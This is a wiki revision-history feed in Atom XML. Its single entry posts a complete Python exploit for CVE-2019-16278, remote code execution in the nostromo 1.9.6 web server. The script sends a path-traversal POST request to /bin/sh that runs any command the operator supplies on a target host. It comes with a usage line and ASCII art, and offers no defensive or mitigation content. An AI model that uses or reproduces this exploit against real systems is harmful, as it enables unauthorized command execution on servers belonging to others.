<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-16278_nostromo_1.9.6_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2019-16278 nostromo 1.9.6 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-16278_nostromo_1.9.6_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-16278_nostromo_1.9.6_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T08:40:40Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-16278_nostromo_1.9.6_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1292&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: nostromo 1.9.6 - Remote Code Execution # Date: 2019-12-31 # Exploit Author: Kr0ff # Vendor Homepage: # Software Link: http://www.nazgul.ch/dev/n...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-16278_nostromo_1.9.6_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1292&amp;oldid=prev"/>
		<updated>2021-04-09T02:49:48Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: nostromo 1.9.6 - Remote Code Execution # Date: 2019-12-31 # Exploit Author: Kr0ff # Vendor Homepage: # Software Link: http://www.nazgul.ch/dev/n...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: nostromo 1.9.6 - Remote Code Execution&lt;br /&gt;
# Date: 2019-12-31&lt;br /&gt;
# Exploit Author: Kr0ff&lt;br /&gt;
# Vendor Homepage:&lt;br /&gt;
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz&lt;br /&gt;
# Version: 1.9.6&lt;br /&gt;
# Tested on: Debian&lt;br /&gt;
# CVE : CVE-2019-16278&lt;br /&gt;
&lt;br /&gt;
cve2019_16278.py&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
&lt;br /&gt;
import sys&lt;br /&gt;
import socket&lt;br /&gt;
&lt;br /&gt;
art = &amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
                                        _____-2019-16278&lt;br /&gt;
        _____  _______    ______   _____\    \   &lt;br /&gt;
   _____\    \_\      |  |      | /    / |    |  &lt;br /&gt;
  /     /|     ||     /  /     /|/    /  /___/|  &lt;br /&gt;
 /     / /____/||\    \  \    |/|    |__ |___|/  &lt;br /&gt;
|     | |____|/ \ \    \ |    | |       \        &lt;br /&gt;
|     |  _____   \|     \|    | |     __/ __     &lt;br /&gt;
|\     \|\    \   |\         /| |\    \  /  \    &lt;br /&gt;
| \_____\|    |   | \_______/ | | \____\/    |   &lt;br /&gt;
| |     /____/|    \ |     | /  | |    |____/|   &lt;br /&gt;
 \|_____|    ||     \|_____|/    \|____|   | |   &lt;br /&gt;
        |____|/                        |___|/    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
help_menu = '\r\nUsage: cve2019-16278.py &amp;lt;Target_IP&amp;gt; &amp;lt;Target_Port&amp;gt; &amp;lt;Command&amp;gt;'&lt;br /&gt;
&lt;br /&gt;
def connect(soc):&lt;br /&gt;
    response = &amp;quot;&amp;quot;&lt;br /&gt;
    try:&lt;br /&gt;
        while True:&lt;br /&gt;
            connection = soc.recv(1024)&lt;br /&gt;
            if len(connection) == 0:&lt;br /&gt;
                break&lt;br /&gt;
            response += connection&lt;br /&gt;
    except:&lt;br /&gt;
        pass&lt;br /&gt;
    return response&lt;br /&gt;
&lt;br /&gt;
def cve(target, port, cmd):&lt;br /&gt;
    soc = socket.socket()&lt;br /&gt;
    soc.connect((target, int(port)))&lt;br /&gt;
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2&amp;gt;&amp;amp;1'.format(cmd)&lt;br /&gt;
    soc.send(payload)&lt;br /&gt;
    receive = connect(soc)&lt;br /&gt;
    print(receive)&lt;br /&gt;
&lt;br /&gt;
if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    print(art)&lt;br /&gt;
    &lt;br /&gt;
    try:&lt;br /&gt;
        target = sys.argv[1]&lt;br /&gt;
        port = sys.argv[2]&lt;br /&gt;
        cmd = sys.argv[3]&lt;br /&gt;
&lt;br /&gt;
        cve(target, port, cmd)&lt;br /&gt;
   &lt;br /&gt;
    except IndexError:&lt;br /&gt;
        print(help_menu)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>